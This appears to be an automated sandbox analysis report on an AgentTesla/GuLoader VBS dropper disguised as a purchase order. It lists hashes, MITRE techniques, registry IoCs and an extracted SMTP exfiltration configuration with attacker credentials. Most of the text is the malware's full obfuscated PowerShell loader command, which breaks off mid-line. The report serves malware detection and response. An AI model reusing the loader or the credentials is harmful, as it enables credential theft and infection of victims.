agenttesla | 81e48f7d4eb10f36f70c5754f4b41f17bd026929f61b0ae76707465329c7028b

General

Target

Pedido nº 22005815-OP.vbs
Size

307KB
MD5

bfc35dea784417373a4669122b88c135
SHA1

bde38cb3001f1ad85cfa419a4def0549a181f7b0
SHA256

81e48f7d4eb10f36f70c5754f4b41f17bd026929f61b0ae76707465329c7028b
SHA512

275a2981d85bf491460ba1410e80aa580782c0ec9433b516e0f3b0278753a91d3c884fd2a8d79b0cd5e939851ee11a0a84dcd04e8656627b7d0a4bfe707cdbbd
SSDEEP

6144:HXkH5Af/YIIqK1LVaKNYiUNMTlnRdaNbokQXmv8h9tudm:3kH5Af/rRK1LVDNJaREM8hPB

Score

10^/10

agenttesla guloader collection downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.trualliant.com
Port:
587
Username:
[email protected]
Password:
trualliant123
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1208	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3992	caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4684	powershell.exe
3992	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4684 set thread context of 3992	4684	powershell.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1552	powershell.exe
1552	powershell.exe
4684	powershell.exe
4684	powershell.exe
3992	caspol.exe
3992	caspol.exe
3992	caspol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4684	powershell.exe
4684	powershell.exe
4684	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	3992	caspol.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 4844	1208	WScript.exe	79
PID 1208 wrote to memory of 4844	1208	WScript.exe	79
PID 1208 wrote to memory of 1552	1208	WScript.exe	81
PID 1208 wrote to memory of 1552	1208	WScript.exe	81
PID 1552 wrote to memory of 4684	1552	powershell.exe	85
PID 1552 wrote to memory of 4684	1552	powershell.exe	85
PID 1552 wrote to memory of 4684	1552	powershell.exe	85
PID 4684 wrote to memory of 4316	4684	powershell.exe	90
PID 4684 wrote to memory of 4316	4684	powershell.exe	90
PID 4684 wrote to memory of 4316	4684	powershell.exe	90
PID 4684 wrote to memory of 4956	4684	powershell.exe	91
PID 4684 wrote to memory of 4956	4684	powershell.exe	91
PID 4684 wrote to memory of 4956	4684	powershell.exe	91
PID 4684 wrote to memory of 3992	4684	powershell.exe	92
PID 4684 wrote to memory of 3992	4684	powershell.exe	92
PID 4684 wrote to memory of 3992	4684	powershell.exe	92
PID 4684 wrote to memory of 3992	4684	powershell.exe	92

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido nº 22005815-OP.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Windows\System32\cmd.exe
  cmd /c echo REG_SZ
  2⤵
  PID:4844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Recivilization = """DesFReeuRaznDepcStitResiAvloExcnObj EksNPreeOvetRemvBarrJuskUrusKraabalnKelaLevlPibyAcosLaseDes1Omg1Fir0Ric0Mau0Ina Dry{StopOpfaOmdrBloaDebmRag(Yar[GraSFortirrrMariSocnIndgPri]Pol`$UncPVeduCoglDewiDiakEks)bug;TerFSvaoAmbrFly(Fin`$GenESkunBoitSteiVelrWaieMettTaniTiteNemsBlu=Lil3Gni;Cul Blo`$forELavnCentPosiCoqrFlleRactTviipcteOffsBur Opi-slalUnmtTrk Pit`$proPVeduanelVociSenkSkn.HaaLObdeStonbligFaltTilhRes-Taz1Min;Sep Tri`$TilEDelnDestUnbiGrmrGgeedeatUntiVapeSkosKno+Stu=Dis(mes3Wel+Ove1Cho)Sli)Str{Pen`$IntJexpoHomwsemaanorMulsBes Hon=mol Adm`$SilJIrroAntwMikaSymrKansCos Epi+Tan Var`$PtoPPosuHjrlSpriKomksti.TotSHuluhytbProsKaltDrorUndiFornEksgHef(Cus`$TriEVagnAmetSigiModrCoeeovetAseiMokeElasFor,Esk Aff1Bre)Mam;Ful}Pas`$AffJShooUdswKioaCoerOvesall;Sol}Dyb`$ForNekseUndtTopvFrkrWarkBogsHalascanTeraSwilSamyVicssyreCep1hyp1Con0Pod0Int2Cen Brn=Rat MasNPateSoltudevCamrGrakGdnsBanaWavnungaSynlSucyoutsRubemnt1Une1Fug0Und0Unt0Kno non'UnpaHondGuriudkIstrSHjeyTagnTilnStiRDysePtesOesvTruFSdtuHypgindoAciBSolaVidlFlekKdkFFalolimrAskeSepCIonaVarlDek-SteACirdCregSkiEArtTVizaSeabgyaxCraOCousCeneWinpIndfBruoPugrsgerArcRdifePersMaleAgiIDysnRawrErnsFortBayeMatrOpksKriBCenuKaflDomiSgnAAttnLydsArmoSpeRUndeAfncJohnCraCThilLaioIde The'Rud;Gib`$EvaNReaeAfktSolvStararokBlasFejasubnHipaUnrlOpeyOsssHaleBys1Lam1Per0Rad0jel1Tau Lig=Dep TroNCubeSpetLydvBabrEkskEmasMovatvanRutaOpelTenyInksMuseSmr1Par1Bra0Ali0mag0Yau Gri'PaaPFolrSafokug`$TviAHexrBilgInoCStiPBrneKakrConlTugVCryoFleuSpraKonKkonaDealLatwPrpUPtenRivdBitlConTForouncyUnseSkrFBearAbdeEscsConTStneFurlTrasMotKSaioTeonDat[ClaYSpaoWisxSpe`$ChadFloeForvGenEMosoPremnazgOldnRosUUnsnAposVoltVanAKullFoolSnaiIw HspejfemeEtyrKurAUnraFergUnceVicMTaaiBoucAnotHenDSkoiNdvskriiildEpollKaevInseRhiMReaaUnanKnisFreMConiGersWin/HypAdetmParpder2ordSTripGrirSam]ScaRTamfclooHan MysSDybtTorrGer=AlkIFagmUpbpAnt MetVImmeAlvnhen[AutRReayLejkDowcPriDAfvrSernNapoBrifIsiabrnbKannUdmMMisaBesnGravLaeRDisiFornAffeTilUAntlPrutBrorSekSInncSnihIndtKorJsapaRencsen]ForNBlaomatnund:albMIndaMuldLon:incFMeglSamoKonTPusWVidoBlyoBlooAnsNCreaSlavKunBChiLMulaMacgLskySwiCCeroForuInftOcrJKaroDibwAnteBloVOffrPiliTun(SenPCeralertBge`$RadGCroeModndulPLjeSSimcPedaGnouSpoOUdspFargloflbolUDeddOvefThyiBooTLadkspekOmlktilVYeeiUprpMud.BruWMineKomnChaSLejNmatotipnProuHypPBleoOrdsAmobTacSAnrcSleoConsHorIFolnCowsHyptMelOdisfSkafPutrUnpPSavoIndlSquiNonTPorvKiteDomnInaEDeayAfreabogBrnNHypoAftnbry(KonIIhnnRenfScu`$tipOLevrKaroAboESdeCFirhCoaiPronNonAChinRejtrodtSalAAfsdElsvHypiMicUAggbFlyeIndrJudEVankGodsThoeIndDBereSamgAnstSwiSRunuBappAleiWisSAmyvBucokageSamUSannCordBacsMarASnolIsnaKom,MelsDgnpUdkoFig ParCTodoEnduVar2VisAFannFedtHic)UnsUtrkmPeruCoa,worSFortSynuIzt DemPSterreboTre1ColJStrvGlenMus6AdmKBrynPreaBai)BehaDispCojavin Kna'Kal;OccFBeruTilnIotcDiptRuciHetoDemnSvo AcaHTipTNonBPer Ski{UngpHnganedrGigaNonmopl(Mat[RivSContBerrlaaiHernUhugZlo]Val`$RekPJuluGrnlLosiForktae)Ple;Tan`$MixCLozlBalafrdwRetlMeleUnasPossToa Unf=hir SkuNAnteColwIps-JurORykbBytjBloeResclsbtInt RnnbDrayDrmtMireKas[ben]Vid ret(Non`$SanPDruuFamlMiniDuakUfo.CalLNoneBalnRepgUnntRowhPro Dop/Coa non2Bar)Dis;DraFHemoFrarUnd(For`$UndEDvanStotForiMirrBesemontdykiBraeUngsDis=Fir0Mug;Koi Unb`$aarEAllnSeltElviUnprVioeNoatInfiStiePossVel Tri-SiklStutDb ska`$BogPStauhypltraiInckSab.ConLDaleUninFregPavtmychafb;Hov Pla`$TanESlanStutcleiFejrAhoeDaktSpiibloeInssPre+Ste=Nat2Ska)Pos{Ner.Sub(Ide`$adoNAuteRantDenvudbrskokTrosalmaAfmnTugagolldisyKrysForeAcr1emm1Boc0Uds0Rev2Unc)Pin Ren`$AniNFraeGratKamvelarTilkTyssCenaBehnRegaAdilPsyyFresWooeAbs1Kjo1Myc0Bew0cla1Rep;Reg`$SttCPialGomaForwPullTreeSpasGrasFor[Met`$CoaEIndnDybtForiDomrWeneOedtPegiEpiegensSum/Ung2Tog]Ren Bal=Oak Fou(Udl`$DreCEdvlKanaBetwTralFeseCensSnesTip[Ave`$AdeEInsnSjatStaidrmrdexeMartKloiNateWessThe/Afg2Bet]Rab Bkk-vidbComxForoProrKor Pho1Gry1rel4Bro)Kil;Ged}Und[UnfSSvetLanrPriiGornObegNop]Mag[UnrSBisyArmsRegtCoueHvimKit.secTCadeSofxBortGig.LbeEUvsnVedcCenoThedCotiEklnyergmel]Wea:Bru:SlgALunSTomCAndILynIkol.forGDokeSoltBinSSuktInirGviiMelnDepgski(Hyd`$SteCRgvlEncaambwRevlmaneFnosRefsUnd)Bjn;Tan}Hud`$droUSvenAporMagoKnybReieRegsOps0Pho=RenHHomTforBAug Ent'spr2Air1Dag0CivBMac0Lag1Kon0Rud6Ble1Fla7Com1DemFWid5LooCDej1Syn6eig1ProEFdt1PotEKar'Sek;Foe`$MalUCurnSnerVinodisbAlgePresChi1Non=SloHIndTInfBChr Bes'Sak3ArgFHyp1terBLaw1Han1Int0Ove0Inv1CopDUdp0Maa1Sty1VejDVen1Dor4pro0Bog6Dow5MamCCub2gon5App1OrdBBlo1SkjCNav4Pro1See4Ten0Pot5CasCWhi2Oma7ine1TerCPil0Sky1Med1ida3tan1Bes4Int1Euc7Tri3UinCjud1Mat3Ano0Int6Ska1DamBant0Cha4sla1Irl7Non3OriFInd1Ter7Und0Ing6Rhe1AvaACut1IsoDDan1Stu6Gra0Non1Ind'Pap;Kil`$KvaUOctnGalrJenoIndbMateGassfej2Abs=SpuHbayTSkrBRen stv'Eve3Gen5Ung1Cha7Imm0Hor6Cal2Jin2Eft0Trk0Ung1BloDRet1Kde1sju3Ans3Cho1Sub6oro1Bnf6Ens0Rup0Sko1Bre7Val0Sta1Spa0Ete1Mon'Ska;Dew`$BekUMaanHjerHypoTrabOveeAposSul3Pun=RidHTanTFriBAll Unm'All2Svu1Mis0AfiBFra0Sti1Var0Pap6Men1sti7Lie1FreFHab5PreCDef2Fou0sab0Int7Def1FreCMed0For6dul1SizBOve1SkiFVil1Wal7Ret5HovCArv3UnsBMul1IsoCSyn0Tur6Pre1Haw7Tru0Spe0Ram1DivDThe0hir2Kri2Nel1Per1bus7pho0Inb0Nar0Tra4ang1TeaBNat1Mus1Cen1Fen7Fag0Sal1hor5LebCScl3AkeADdb1Maj3You1GraCAud1Air6Heb1ColEHom1Imp7Ker2Ane0reo1Shr7Sla1For4ded'Tri;kon`$GraUSponRatrSekoTrebKlaeNvnsSpl4Tea=PusHPteTAnkBMul Dre'alk0Pre1Ata0Psy6Uni0Spo0Fip1OblBSta1KalCCla1Skn5Per'Nic;kol`$RegUArtnVirrUnmoStebOutesynsopd5Cop=StoHMilTZetBBem Cos'Ral3Swi5Slu1Bls7bes0Tje6vej3HmnFFas1egnDPar1Tel6Mel0Sam7Kun1HimERep1Can7Tel3ForAGer1Sup3Dan1SupCmod1Sol6Unp1DraEKam1Gra7Bud'fal;Ret`$YarUkavnLayrPugoSkebMeseBalsSte6bru=HybHSkoTRoxBju Kon'Fng2Mat0Ant2Ren6Sne2Div1For0Gyn2Qua1Neo7Tek1Apj1Fre1ufoBLsk1Jag3Lnn1hjeEUnd3JokCBru1Ery3opl1omnFKrs1Smi7For5OveEPil5Rem2Ele3HedAVir1YepBLib1Hej6Hal1Sor7Apa3Lev0Fan0RedBVid2Fel1Rep1raaBSup1Hay5Beh5essEFul5Kry2Str2Bar2Rem0Bal7Fug1Rea0Ruf1GenESrk1RisBhyd1eft1Deu'Dia;Tra`$ForUSecnProrTweoOpsbLuneWelsGru7Air=HauHPyjTFriBOst Let'Geo2Sti0Spe0Bra7Keg1PagCPer0Suk6Foo1SpgBMak1ReaFWhe1Bra7Ing5HilEFor5Fir2Unr3LemFLen1Adv3Ibl1VioCUnc1Fje3Min1Uds5Spe1Ort7Til1Sol6Daf'Nep;Zag`$DubUStinXysrKonoQuebJoreFagsJoc8Sto=barHFieTAflBRes But'Att2Udh0Muf1Hae7Unc1Rep4Sal1AutEUnd1Unp7Mia1Fll1Fik0Boo6Mil1Ens7Var1Mel6Dok3Oly6Alv1non7Pat1ShuEora1Fla7Jas1For5Bie1Bin3Kre0Ruf6Tra1Cry7Hil'Ove;Gni`$RenURapnlarrGafoklabRemetilsVer9Spi=CohHAttTOprBTyk Pep'Teg3VseBfgt1BhuCUpd3KumFOpl1Sni7Stu1PreFApp1AfsDdub0Pro0min0ImpBPer3TjeFBea1DedDUnd1Hys6reb0non7For1AliEkan1Lat7Hik'Ove;Enr`$ConFFruoTrirRunmFleoXansUnaanecnChasHagkBraeEft0Apo=DatHUdlTSfrBVan Anp'Dag3ForFDec0SelBStv3Ord6Dt 1Und7Soe1KunERei1Unw7kun1Per5Sel1Rid3Rse0Hyp6Ref1Ops7Pet2Anc6Clo0RibBRaa0Cro2uns1Udr7Lys'Vic;Kra`$HetFMoooHodrColmFeroNocsBloaMednHaesSexkVerePea1Non=TraHFloTarbBcro Ufo'Fur3Aff1Ste1KedEEmb1Fly3Xcl0Ace1Res0Fes1Man5DerEafd5Ant2Med2Wis2Dad0Boi7Syl1Fib0Ass1GalEIld1BilBSku1For1mon5filESer5Pot2Pyr2Ala1Reu1Pod7Foo1Cra3xyl1EjeEBes1Fal7Ven1Tve6Wor5GenESly5Pje2Whe3bra3Dai1FljCden0Rev1svm1TraBPoc3Swi1Blo1SndEFly1Sup3Get0Hor1Ret0Stj1lig5voiEBue5Gro2bed3Adr3Arc0Unm7Tar0Doc6Cam1afgDKva3byf1Piu1HniESkr1Uds3Ver0Uds1Tri0cal1Mus'Ref;Svm`$TurFFrioEunrBasmHavoFucsForaHypnMissTrakDoreRec2Xip=FarHBadTReeBPre Gou'Sna3ImmBKos1PapCChr0Spo4syn1HelDMis1Pil9Eth1Ved7Paa'Cha;Aut`$ForFDecodesrtrumUnboLsesParaLulnHeisTrakStreCal3Blo=AttHRonTSanBiwe Ska'Cyl2Aqu2ska0Wax7Unw1Fan0Gal1ankEEft1FlaBShe1Suc1Lam5NicEBor5Isk2Sch3AnnAHal1SpgBBas1Hip6Ect1Pro7upa3Und0Alt0CorBBle2Udb1Ama1VasBRdv1Udr5Jan5UbeEKva5Una2Bev3skgCEng1Pus7For0Sta5Tel2Tyr1Sex1TilEBly1EmaDSav0S K6Alb5unsEMit5Her2Non2Sed4Abs1KunBBoo0Fre0Dis0Van6Lae0Pug7Ski1Foo3Imp1DomEdat'Far;Hyr`$FunFCenosusrSpimUngoEccsHeaasu nBunsPerkcykeMao4Kan=FyrHBopTStrBPar Kom'Rod2Nav4Lis1SliBest0Cat0Uni0lin6Lac0Cam7Cam1Def3Por1TriESyn3Tam3inf1intESub1RamEFue1SorDPre1trn1Skl'Dac;Sla`$tilFHieoVekrtramIndoSalsKruaFlunJulsGulkVioeeth5Sni=VanHVarTMiqBDem Qua'Sku1PavCRig0Nor6Par1Dem6Sju1FruEIdr1AshECan'Ich;Bul`$AdrFHuloEmerGromGrnoGlisAlvaBusnMansGenkOutebel6Tra=BehHPliTBanBKon Lde'Iga3HumCnat0Lor6For2Aqu2Ham0Oli0For1DraDFic0Hae6Afb1bac7Afs1alk1Tre0Tof6Rem2brn4Uty1ProBQui0Tot0Fun0Neu6Ura0Skr7Van1Aft3Toe1spiEIta3HerFStv1neu7Wan1TerFsem1RefDfej0Cra0Exo0HybBScr'Pyt;Sin`$sygFFeuoBfsrAntmParoLinsBnnaSkynstrsEntkmoseFor7Bre=PadHStuTAntBInd Jvn'Ska3PugBFor3Har7Ben2UnmAUns'Pel;Nah`$SpeFNoroUndrSummVuroPhasSelaYvenMelsIndkTvteHel8Rep=lbeHKkkTVifBRen Gia'Hus2ReuEKry'Wag;firfMoouUdbnKnicByrtDepiMalosknnBur MarfUnlkTilpDok Var{PeaPLovaCotrBraaPusmCas Sma(Sol`$gormcuruafflBebeGejbWinaAsscBorkDia,Eng Gas`$HaaRConeHercAidoSubnTracBriiTyvlColeKulmSliefornTiltMeasGlo)run Qua Sny apo Uba Und;For`$MarLPolaPolbTodyImprDkniOvenVantRetiAchsAnakJaceEmu0Skr Stu=TriHFedTTndBPak blo'Cit5Att6Vid2Sel6Dis0Ker0Moq1Ten4Sup0Gru0Vej1FunBCon1Edd7Unp5Alp2cat4besFFej5Doc2Kli5MonARse2Uns9Dob3mas3Lar0sik2Ope0Gru2Pul3Ska6tes1GerDbet1preFBen1Ove3Rag1TheBTer1KunCYuc2LusFpse4Ope8Rim4Bec8Dol3Rut1Ide0Sve7dgn0Ang0con0Afs0nec1Hag7Kon1PolCPel0Hou6Wag3Til6Geo1RoyDFav1MajFUnf1Ter3Mic1MedBFil1HolCFur5BenCbru3Aas5Hel1Out7Lep0Sal6Opi3Wol3Cen0Tel1Tec0Wol1Aps1Hjf7Mik1TsuFSte1sul0Raa1KonELav1CotBSko1Emu7Bef0Gen1for5ForAWhi5CocBJoy5Off2Str0EskETar5Tek2Vae2For5Bla1phyASpe1Inv7Com0Han0Eft1Kuk7Kva5FejFOve3RouDMis1Dam0Sid1Rep8Pho1Alt7Ano1Bag1Clo0Uri6gav5Maa2Uds0Mad9Out5Spa2Coc5Pro6Kon2AftDboo5ForCNon3For5Aff1HudEMaa1VenDOms1Acu0Thi1For3Yde1TheEFib3Liv3Ako0Hex1Ono0Sto1Kon1Pol7Tra1RegFnon1Drm0Kir1FysECou0VerBRet3Jai1Bnn1Wic3Plu1cun1Hug1SupAtwi1smd7For5Alf2Kna5OstFRom3Dob3Ele1BedCnon1Tro6Gra5pie2App5For6Bre2HalDRes5DecCBrn3ShuESka1UviDDue1Ded1Say1Beh3niv0Vad6Rok1HemBbru1UnvDEks1UdsCPig5NigCref2Jer1cel0Gif2Cod1RecEGle1FatBUnp0Tre6Ort5FlgASki5mic6Mob3Mod4Par1PreDMus0Spr0Idi1HarFAug1RumDUds0bas1Fib1slu3bir1FrsCKap0Kli1Bit1Kns9Sle1Emb7Erh4pauAPre5TowBbul2Afs9Til5PrvFBel4Sno3Qui2adjFAar5SkoCkre3Ske7Ter0For3Hir0Uni7Cre1Bre3Fla1DevEkab0hac1Daw5BeaAMes5Mag6Imp2Non7Kre1ArmCRea0Und0Ops1BanDMac1Sub0Sup1Unp7Tot0Ops1Ove4Mel2Opi5ConBMas5Fal2Hje0DerFYve5GoiBPla5GraCBul3Teg5For1Dee7Adr0Ove6Pre2Gen6Ste0SelBLvs0Par2ung1Azy7Jud5SedAInt5Fje6Opp2Det7for1DivCUns0Pal0Lic1ResDono1kor0Res1Vic7Dis0Lni1ari4Ref3Fys5InqBEsk'Afb;int&Sha(Sid`$TetFIstoidorGadmProoGrasRapaOccnImbsvilkEsoeKam7Ord)Kom Str`$lgeLSagaHypbMelyTenrUngiVeinSprtindiUndsMihkKateBev0Rou;Unh`$tilLarbaPosbUnmyParrBroiVolnIldtFuziAndsSavkBroeeks5arg Mel=Bel UtiHSkyTDioBHal Bag'Kll5Tro6Out2Phy1Afs0Bon6Kur1ReaBMek1unaFRan1Mot7Dat0Und0Fol1EncBBnh1DorCSub1Sta5Ort1Pyo7Ste0Blo0Sst5Try2Dub4DotFTam5Tit2Mig5Nob6Lan2Geo6Rep0Spe0Srt1For4Fre0flo0Cor1KruBass1Mac7Str5KomCUnd3emb5Men1Pro7Out0Nap6Fri3LucFInd1Dis7Haa0Har6Toh1fleAKok1ForDInt1ort6Omk5DioAHov5Reb6Men2Non7Slu1IndCUdh0Mde0col1NosDEro1ban0rac1Beg7Sva0Pas1Ssk4Pas0Unr5CliEAni5Ver2Wee2Mes9Vul2Til6Qua0KasBLsg0Cen2Caz1Rau7Ove2Phy9akr2IgnFMar2SwiFMil5men2pro3Dia2Klv5EpiANon5Syu6Bol2Drn7Qua1VarCbra0Ben0Tmm1EmuDPre1Ben0Bog1Ela7Win0Sub1Str4Vin1Ang5LseESkr5Dar2Ing5Unr6Atl2Adj7Maj1IteCArg0tak0Det1MetDNon1Kum0Deh1lea7Reg0Alk1Per4Ant6Pla5ForBThe5AnaBMah'Dis;Bok&Fle(Asc`$IsoFRouoWarrrasmOveoNansTelaJimninssFlakLuneAkk7Reb)Cha 